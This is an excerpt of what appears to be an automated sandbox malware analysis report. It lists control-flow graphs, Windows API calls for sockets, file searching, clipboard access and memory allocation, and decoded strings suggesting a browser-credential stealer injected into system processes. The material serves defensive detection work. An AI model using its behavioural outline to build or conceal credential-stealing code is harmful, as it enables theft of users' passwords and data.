                                                            control_flow_graph 230 b732592-b7325d6 call b732012 call b739ea2 235 b732678-b73268c 230->235 236 b7325dc-b7325de 230->236 237 b7325e2-b7325f3 SleepEx 236->237 237->237 238 b7325f5-b732607 237->238 239 b732609-b73260f 238->239 240 b73263d-b732643 238->240 239->240 241 b732611-b732626 call b733002 239->241 240->237 242 b732645-b73264b 240->242 241->240 247 b732628-b732638 call b732a42 241->247 242->237 244 b73264d-b732653 242->244 244->237 246 b732655-b732666 call b733e12 call b7394a2 244->246 252 b73266b-b732673 call b7323f2 246->252 247->240 252->237
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.513596661.000000000B700000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B700000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_b700000_explorer.jbxd
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID: sedZ
                                                            • API String ID: 3472027048-2633879532
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 255 b736fe2-b737015 256 b737017-b737039 call b739ea2 255->256 257 b73703f-b737067 send 255->257 256->257
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.513596661.000000000B700000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B700000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_b700000_explorer.jbxd
                                                            Similarity
                                                            • API ID: send
                                                            • String ID: send
                                                            • API String ID: 2809346765-2809346765
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 260 b736ecc-b736f0a 261 b736f34-b736f55 socket 260->261 262 b736f0c-b736f2e call b739ea2 260->262 262->261
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.513596661.000000000B700000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B700000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_b700000_explorer.jbxd
                                                            Similarity
                                                            • API ID: socket
                                                            • String ID: sock
                                                            • API String ID: 98920635-2415254727
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 265 b736ed2-b736f0a 266 b736f34-b736f55 socket 265->266 267 b736f0c-b736f2e call b739ea2 265->267 267->266
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.513596661.000000000B700000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B700000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_b700000_explorer.jbxd
                                                            Similarity
                                                            • API ID: socket
                                                            • String ID: sock
                                                            • API String ID: 98920635-2415254727
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 270 b73949c-b7394d6 271 b7394d9-b7394dd 270->271 272 b739559-b739562 271->272 273 b7394df-b7394e2 271->273 272->271 274 b739568-b739571 272->274 273->272 275 b7394e4-b73954f call b73b302 call b73b2d2 call b73a4e2 273->275 276 b739573-b73957a 274->276 277 b7395aa-b7395c6 274->277 275->272 289 b739551-b739557 SleepEx 275->289 279 b73958f-b739598 276->279 280 b73957c-b73957d 276->280 279->277 283 b73959a-b7395a1 279->283 282 b739583-b73958d 280->282 282->279 282->282 283->277 285 b7395a3-b7395a4 283->285 285->277 289->272
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.513596661.000000000B700000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B700000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_b700000_explorer.jbxd
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID:
                                                            • API String ID: 3472027048-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 290 b7394a2-b7394d6 291 b7394d9-b7394dd 290->291 292 b739559-b739562 291->292 293 b7394df-b7394e2 291->293 292->291 294 b739568-b739571 292->294 293->292 295 b7394e4-b73954f call b73b302 call b73b2d2 call b73a4e2 293->295 296 b739573-b73957a 294->296 297 b7395aa-b7395c6 294->297 295->292 309 b739551-b739557 SleepEx 295->309 299 b73958f-b739598 296->299 300 b73957c-b73957d 296->300 299->297 303 b73959a-b7395a1 299->303 302 b739583-b73958d 300->302 302->299 302->302 303->297 305 b7395a3-b7395a4 303->305 305->297 309->292
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.513596661.000000000B700000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B700000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_b700000_explorer.jbxd
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID:
                                                            • API String ID: 3472027048-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 310 b733e12-b733e25 311 b733eb4-b733eb9 310->311 312 b733e2b-b733e33 310->312 312->311 313 b733e35-b733e3d 312->313 313->311 314 b733e3f-b733e47 313->314 314->311 315 b733e49-b733e51 314->315 315->311 316 b733e53-b733e5b 315->316 316->311 317 b733e5d-b733e65 316->317 317->311 318 b733e67-b733e6d OpenClipboard 317->318 318->311 319 b733e6f-b733e85 318->319 321 b733e87-b733e93 319->321 322 b733ea9-b733eb0 319->322 321->322 325 b733e95-b733ea1 call b733bf2 321->325 322->311 325->322
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.513596661.000000000B700000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B700000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_b700000_explorer.jbxd
                                                            Similarity
                                                            • API ID: ClipboardOpen
                                                            • String ID:
                                                            • API String ID: 2793039342-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.513596661.000000000B700000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B700000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_b700000_explorer.jbxd
                                                            Similarity
                                                            • API ID: CreateThread
                                                            • String ID:
                                                            • API String ID: 2422867632-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 337 b736f57-b736f59 338 b736f5b-b736f5f 337->338 339 b736fbc-b736fbf 337->339 338->339 340 b736fc5-b736fe0 WSAStartup 339->340
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.513596661.000000000B700000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B700000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_b700000_explorer.jbxd
                                                            Similarity
                                                            • API ID: Startup
                                                            • String ID:
                                                            • API String ID: 724789610-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.516818332.00000000118E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 118E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_118e0000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .dll$32.d$M$S$el32$kern$ll$sedZ$user
                                                            • API String ID: 0-2283910409
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.516818332.00000000118E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 118E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_118e0000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                            • API String ID: 0-3558027158
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.516818332.00000000118E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 118E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_118e0000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: UR$.$2$: $: $A$D$L: $M$Pass$T$User$a$f$l$l$n$name$r$word$z
                                                            • API String ID: 0-1505927383
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.516818332.00000000118E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 118E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_118e0000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: UR$.$2$: $: $A$D$L: $M$Pass$T$User$a$f$l$l$n$name$r$word$z
                                                            • API String ID: 0-1505927383
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.516818332.00000000118E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 118E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_118e0000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: U$b$d$k$n$o
                                                            • API String ID: 0-1739295752
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.516818332.00000000118E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 118E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_118e0000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .dll$cryp$dll$nss3$t32.
                                                            • API String ID: 0-1478216402
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.516818332.00000000118E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 118E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_118e0000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .dll$cryp$dll$nss3$t32.
                                                            • API String ID: 0-1478216402
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.516818332.00000000118E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 118E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_118e0000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 2.dl$dll$l32.$ole3$shel
                                                            • API String ID: 0-1970020201
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.516818332.00000000118E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 118E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_118e0000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: -Age$User$nt: $on.d$urlm
                                                            • API String ID: 0-1987325725
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.516818332.00000000118E0000.00000040.00000001.00040000.00000000.sdmp, Offset: 118E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_118e0000_explorer.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .dll$el32$h$kern
                                                            • API String ID: 0-4264704552
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Execution Graph

                                                            Execution Coverage:7.6%
                                                            Dynamic/Decrypted Code Coverage:1.5%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:1089
                                                            Total number of Limit Nodes:116
34076->34077 34078 27ccd4c 34077->34078 34093 27dc600 34077->34093 34078->33898 34082 27ccd87 34083 27dc870 2 API calls 34082->34083 34084 27ccdaa 34083->34084 34084->33898 34086 27ccde5 34085->34086 34102 27dc470 34086->34102 34089->33904 34090->33910 34091->33914 34092->33918 34094 27dd3a0 LdrLoadDll 34093->34094 34095 27dc61c 34094->34095 34096 27ccd6f 34095->34096 34101 4529710 LdrInitializeThunk 34095->34101 34096->34078 34098 27dcbf0 34096->34098 34099 27dd3a0 LdrLoadDll 34098->34099 34100 27dcc0f 34099->34100 34100->34082 34101->34096 34103 27dd3a0 LdrLoadDll 34102->34103 34104 27dc48c 34103->34104 34107 45296d0 LdrInitializeThunk 34104->34107 34105 27cce59 34105->33905 34107->34105 34109 27d534c 34108->34109 34110 27cb150 LdrLoadDll 34109->34110 34112 27d5367 34110->34112 34111 27d5370 34111->33935 34112->34111 34113 27d7760 LdrLoadDll 34112->34113 34114 27d538d 34113->34114 34115 27d7760 LdrLoadDll 34114->34115 34116 27d53a8 34115->34116 34117 27d7760 LdrLoadDll 34116->34117 34118 27d53c1 34117->34118 34119 27d7760 LdrLoadDll 34118->34119 34120 27d53dd 34119->34120 34121 27d7760 LdrLoadDll 34120->34121 34122 27d53f6 34121->34122 34123 27d7760 LdrLoadDll 34122->34123 34124 27d540f 34123->34124 34125 27cb150 LdrLoadDll 34124->34125 34127 27d543b 34125->34127 34126 27d54e9 34126->33935 34127->34126 34128 27d7760 LdrLoadDll 34127->34128 34129 27d545f 34128->34129 34130 27cb150 LdrLoadDll 34129->34130 34131 27d5494 34130->34131 34131->34126 34132 27d7760 LdrLoadDll 34131->34132 34133 27d54b7 34132->34133 34134 27d7760 LdrLoadDll 34133->34134 34135 27d54d0 34134->34135 34136 27d7760 LdrLoadDll 34135->34136 34136->34126 34138 27d5285 34137->34138 34138->33945 34140 27dd3a0 LdrLoadDll 34139->34140 34141 27dc59c 34140->34141 34145 4529610 LdrInitializeThunk 34141->34145 34142 27dc5bb 34142->33951 34144->33951 34145->34142 34147 27d1858 34146->34147 34148 27cb4a0 LdrLoadDll 34147->34148 34149 27d18f6 34148->34149 34150 27cb4a0 LdrLoadDll 34149->34150 34151 27d1911 
34150->34151 34152 27ccdc0 2 API calls 34151->34152 34153 27d1936 34152->34153 34154 27d1a7d 34153->34154 34198 27dc500 34153->34198 34156 27d1a8e 34154->34156 34186 27d1190 34154->34186 34156->33961 34159 27d1a73 34160 27dc870 2 API calls 34159->34160 34160->34154 34161 27d196f 34162 27dc870 2 API calls 34161->34162 34163 27d19a9 34162->34163 34203 27de490 LdrLoadDll 34163->34203 34165 27d19df 34165->34156 34166 27ccdc0 2 API calls 34165->34166 34167 27d1a05 34166->34167 34167->34156 34168 27dc500 2 API calls 34167->34168 34169 27d1a2a 34168->34169 34170 27d1a5d 34169->34170 34171 27d1a31 34169->34171 34172 27dc870 2 API calls 34170->34172 34173 27dc870 2 API calls 34171->34173 34174 27d1a67 34172->34174 34175 27d1a3b 34173->34175 34174->33961 34175->33961 34176->33965 34177->33962 34178->33968 34179->33964 34180->33971 34181->33979 34182->33974 34183->33980 34184->33975 34185->33978 34187 27d11b5 34186->34187 34188 27cb4a0 LdrLoadDll 34187->34188 34189 27d1270 34188->34189 34190 27cb4a0 LdrLoadDll 34189->34190 34191 27d1294 34190->34191 34192 27d7350 10 API calls 34191->34192 34194 27d12e7 34192->34194 34193 27d13a1 34193->34156 34194->34193 34195 27cb4a0 LdrLoadDll 34194->34195 34196 27d134e 34195->34196 34197 27d7350 10 API calls 34196->34197 34197->34193 34199 27dd3a0 LdrLoadDll 34198->34199 34200 27dc51c 34199->34200 34204 4529650 LdrInitializeThunk 34200->34204 34201 27d1964 34201->34159 34201->34161 34203->34165 34204->34201 34206 27d7760 LdrLoadDll 34205->34206 34207 27ce7bf 34206->34207 34208 27ce7c6 GetFileAttributesW 34207->34208 34209 27ce7d1 34207->34209 34208->34209 34209->33993 34234 27dabd0 34210->34234 34212 27d433b 34212->33993 34213 27d42e6 34213->34212 34214 27d4305 34213->34214 34215 27d4347 34213->34215 34217 27d430d 34214->34217 34218 27d432a 34214->34218 34216 27cb4a0 LdrLoadDll 34215->34216 34220 27d4358 34216->34220 34221 27de2d0 2 API calls 34217->34221 34219 27de2d0 2 API calls 34218->34219 34219->34212 34223 27d7350 10 API calls 
34220->34223 34222 27d431e 34221->34222 34222->33993 34224 27d436f 34223->34224 34274 27d3720 34224->34274 34226 27d437a 34230 27d4392 34226->34230 34231 27d4478 34226->34231 34227 27de2d0 2 API calls 34228 27d4583 34227->34228 34228->33993 34229 27d445f 34229->34227 34230->34229 34284 27d3cb0 11 API calls 34230->34284 34231->34229 34285 27d3cb0 11 API calls 34231->34285 34235 27dabde 34234->34235 34236 27dabe5 34234->34236 34235->34213 34237 27cb150 LdrLoadDll 34236->34237 34238 27dac17 34237->34238 34239 27dac26 34238->34239 34286 27da6c0 LdrLoadDll 34238->34286 34240 27de3b0 2 API calls 34239->34240 34261 27dae09 34239->34261 34242 27dac3f 34240->34242 34243 27dadb8 34242->34243 34244 27dac54 34242->34244 34242->34261 34245 27dae5b 34243->34245 34246 27dadc2 34243->34246 34287 27d3800 LdrLoadDll 34244->34287 34248 27de2d0 2 API calls 34245->34248 34288 27d3800 LdrLoadDll 34246->34288 34248->34261 34250 27dac6b 34254 27d7760 LdrLoadDll 34250->34254 34251 27dadd9 34289 27d9ff0 LdrLoadDll 34251->34289 34253 27dadef 34256 27d7760 LdrLoadDll 34253->34256 34255 27dac87 34254->34255 34257 27d7760 LdrLoadDll 34255->34257 34256->34261 34258 27daca3 34257->34258 34259 27d7760 LdrLoadDll 34258->34259 34260 27dacc2 34259->34260 34262 27d7760 LdrLoadDll 34260->34262 34261->34213 34263 27dacde 34262->34263 34264 27d7760 LdrLoadDll 34263->34264 34265 27dacfa 34264->34265 34266 27d7760 LdrLoadDll 34265->34266 34267 27dad19 34266->34267 34268 27d7760 LdrLoadDll 34267->34268 34269 27dad35 34268->34269 34270 27d7760 LdrLoadDll 34269->34270 34271 27dad58 34270->34271 34271->34261 34272 27de2d0 2 API calls 34271->34272 34273 27dadac 34272->34273 34273->34213 34275 27d7350 10 API calls 34274->34275 34276 27d3736 34275->34276 34277 27d3743 34276->34277 34278 27d7350 10 API calls 34276->34278 34277->34226 34279 27d3754 34278->34279 34279->34277 34280 27d7350 10 API calls 34279->34280 34281 27d376c 34280->34281 34282 27de2d0 2 API calls 34281->34282 34283 27d3776 34282->34283 
34283->34226 34284->34230 34285->34231 34286->34239 34287->34250 34288->34251 34289->34253 34291 27d31c9 34290->34291 34292 27d7760 LdrLoadDll 34291->34292 34293 27d3206 34292->34293 34294 27d7760 LdrLoadDll 34293->34294 34295 27d3224 34294->34295 34296 27d7760 LdrLoadDll 34295->34296 34298 27d3246 34296->34298 34297 27d32cc 34297->34009 34298->34297 34299 27d3270 FindFirstFileW 34298->34299 34299->34297 34300 27d328b 34299->34300 34301 27d32b3 FindNextFileW 34300->34301 34304 27d3080 13 API calls 34300->34304 34301->34300 34303 27d32c5 FindClose 34301->34303 34303->34297 34304->34300 34305->34052 34307 27daa86 34306->34307 34309 27dab86 34306->34309 34308 27d7350 10 API calls 34307->34308 34307->34309 34308->34307 34309->34065 34310->34065 34311->34065 34313 27d0cf5 34312->34313 34314 27cb4a0 LdrLoadDll 34313->34314 34315 27d0d5a 34314->34315 34316 27cb4a0 LdrLoadDll 34315->34316 34317 27d0da8 34316->34317 34318 27ce7a0 2 API calls 34317->34318 34319 27d0def 34318->34319 34320 27d0df6 34319->34320 34321 27dabd0 3 API calls 34319->34321 34320->34071 34323 27d0e04 34321->34323 34322 27d0e0d 34322->34071 34323->34322 34324 27cb4a0 LdrLoadDll 34323->34324 34326 27d0e5c 34324->34326 34325 27daa70 10 API calls 34325->34326 34326->34325 34328 27d0ee1 34326->34328 34346 27d0410 34326->34346 34330 27d0f39 34328->34330 34357 27d0770 34328->34357 34331 27de2d0 2 API calls 34330->34331 34332 27d0f40 34331->34332 34332->34071 34334 27d09c6 34333->34334 34344 27d09d1 34333->34344 34335 27de3b0 2 API calls 34334->34335 34335->34344 34336 27d09e7 34336->34073 34337 27ce7a0 2 API calls 34337->34344 34338 27d0ca0 34339 27d0cb9 34338->34339 34340 27de2d0 2 API calls 34338->34340 34339->34073 34340->34339 34341 27daa70 10 API calls 34341->34344 34342 27d0410 11 API calls 34342->34344 34343 27cb4a0 LdrLoadDll 34343->34344 34344->34336 34344->34337 34344->34338 34344->34341 34344->34342 34344->34343 34345 27d0770 10 API calls 34344->34345 34345->34344 34347 27d0436 34346->34347 34348 
27d7350 10 API calls 34347->34348 34349 27d0492 34348->34349 34350 27d3720 10 API calls 34349->34350 34351 27d049d 34350->34351 34353 27d0620 34351->34353 34355 27d04bb 34351->34355 34352 27d0605 34352->34326 34353->34352 34354 27d02e0 11 API calls 34353->34354 34354->34353 34355->34352 34363 27d02e0 34355->34363 34358 27d0796 34357->34358 34359 27d7350 10 API calls 34358->34359 34360 27d0807 34359->34360 34361 27d3720 10 API calls 34360->34361 34362 27d0812 34361->34362 34362->34328 34364 27d02f6 34363->34364 34367 27d3b90 34364->34367 34366 27d03fe 34366->34355 34368 27d3bcd 34367->34368 34369 27d3c7d 34368->34369 34370 27d4b70 11 API calls 34368->34370 34371 27d3c20 34368->34371 34369->34366 34370->34371 34372 27d3c59 34371->34372 34373 27de2d0 LdrLoadDll RtlFreeHeap 34371->34373 34372->34366 34373->34372 34374->33873 34375->33884 34376->33882 34377->33876 34378 27df569 34379 27df50a 34378->34379 34383 27df58e 34378->34383 34380 27df570 34379->34380 34381 27df51a 34379->34381 34382 27de3b0 2 API calls 34379->34382 34384 27de2d0 2 API calls 34381->34384 34382->34381 34385 27df53d 34384->34385 34386 27c9710 34387 27c9735 34386->34387 34388 27cb150 LdrLoadDll 34387->34388 34389 27c9768 34388->34389 34390 27ccd00 3 API calls 34389->34390 34391 27c978d 34389->34391 34390->34391 34392 27db490 34393 27de250 2 API calls 34392->34393 34395 27db4cb 34393->34395 34394 27db5c6 34395->34394 34396 27cb150 LdrLoadDll 34395->34396 34397 27db50b 34396->34397 34398 27d7760 LdrLoadDll 34397->34398 34400 27db530 34398->34400 34399 27db540 Sleep 34399->34400 34400->34394 34400->34399 34403 27db100 LdrLoadDll 34400->34403 34404 27db2e0 LdrLoadDll 34400->34404 34403->34400 34404->34400
                                                            APIs
                                                            • FindFirstFileW.KERNELBASE(?,00000000), ref: 027D3281
                                                            • FindNextFileW.KERNELBASE(?,00000010), ref: 027D32BE
                                                            • FindClose.KERNELBASE(?), ref: 027D32C9
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_27c0000_cmmon32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Find$File$CloseFirstNext
                                                            • String ID:
                                                            • API String ID: 3541575487-0
                                                            • Opcode ID: e13910eb82a3534bfcb50d39b5d44c1b03ce3959003819a512da7cbca0061273
                                                            • Instruction ID: 746ad3cb378af041236a2c7c0bc1f172ed788d3578c0f2739b20604ac4f99da0
                                                            • Opcode Fuzzy Hash: e13910eb82a3534bfcb50d39b5d44c1b03ce3959003819a512da7cbca0061273
                                                            • Instruction Fuzzy Hash: FF31B4B1D002497BEB21EB60CC84FEF777DDF84714F104498B909A6181DA70AA858FA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • NtCreateFile.NTDLL(00000060,00000000,?,027D74BC,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,027D74BC,?,00000000,00000060,00000000,00000000), ref: 027DC78D
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_27c0000_cmmon32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: e649ee6bc546698869febb0294371ff98a37010275feddef859584c4e7f0806b
                                                            • Instruction ID: f57cfeb53dc803803195830d1d35a5d38930efb5671085cec104f71d4aee01d9
                                                            • Opcode Fuzzy Hash: e649ee6bc546698869febb0294371ff98a37010275feddef859584c4e7f0806b
                                                            • Instruction Fuzzy Hash: 0401CFB2210108AFCB18DF98DC84EEB77AEAF8C354F058248BA0DD7244C630E851CBA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • NtCreateFile.NTDLL(00000060,00000000,?,027D74BC,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,027D74BC,?,00000000,00000060,00000000,00000000), ref: 027DC78D
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_27c0000_cmmon32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: f9e00ad4482a0849a297f43a55053ea859885cbadaec293609717f189d3e0e37
                                                            • Instruction ID: d093f355977989d56694bc0ed0399e2a832d67cd9d89159b2457ae7149efe478
                                                            • Opcode Fuzzy Hash: f9e00ad4482a0849a297f43a55053ea859885cbadaec293609717f189d3e0e37
                                                            • Instruction Fuzzy Hash: 38F07FB2215208AFCB58DF89DC85EEB77EDAF8C754F158248BA0D97241D630F851CBA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • NtReadFile.NTDLL(027D7680,027D2B50,FFFFFFFF,027D717A,00000002,?,027D7680,00000002,027D717A,FFFFFFFF,027D2B50,027D7680,00000002,00000000), ref: 027DC835
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_27c0000_cmmon32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FileRead
                                                            • String ID:
                                                            • API String ID: 2738559852-0
                                                            • Opcode ID: ed9694a341561753e05285050faa4932f5bf3abbb446f9e147fe4a392cff66db
                                                            • Instruction ID: dd169fc9a9a9aeeb478597bdf1df8dbfd3e5e8b93a5b24f03b6378a82cf644ae
                                                            • Opcode Fuzzy Hash: ed9694a341561753e05285050faa4932f5bf3abbb446f9e147fe4a392cff66db
                                                            • Instruction Fuzzy Hash: 69F0A4B6204108AFCB14DF99DC94EEB77AAAF8C754F158249BA4DD7640D630E8118BA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • NtReadFile.NTDLL(027D7680,027D2B50,FFFFFFFF,027D717A,00000002,?,027D7680,00000002,027D717A,FFFFFFFF,027D2B50,027D7680,00000002,00000000), ref: 027DC835
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_27c0000_cmmon32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FileRead
                                                            • String ID:
                                                            • API String ID: 2738559852-0
                                                            • Opcode ID: 4a8275df831c3d103a1ee09491f1c56fc34e4d4c9c2c3dd0733fd8e64b380651
                                                            • Instruction ID: d1fc5c7791c5f5bd8dded31f241f19fe7e312fd9b2a272a17b88162a84b4fe31
                                                            • Opcode Fuzzy Hash: 4a8275df831c3d103a1ee09491f1c56fc34e4d4c9c2c3dd0733fd8e64b380651
                                                            • Instruction Fuzzy Hash: 02F0B2B2210208AFCB14DF99DC84EEB77ADEF8C754F118248BE0DA7241D630E811CBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,027C17C4,00000004,00001000,00000000), ref: 027DC959
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 027C0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_27c0000_cmmon32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateMemoryVirtual
                                                            • String ID:
                                                            • API String ID: 2167126740-0
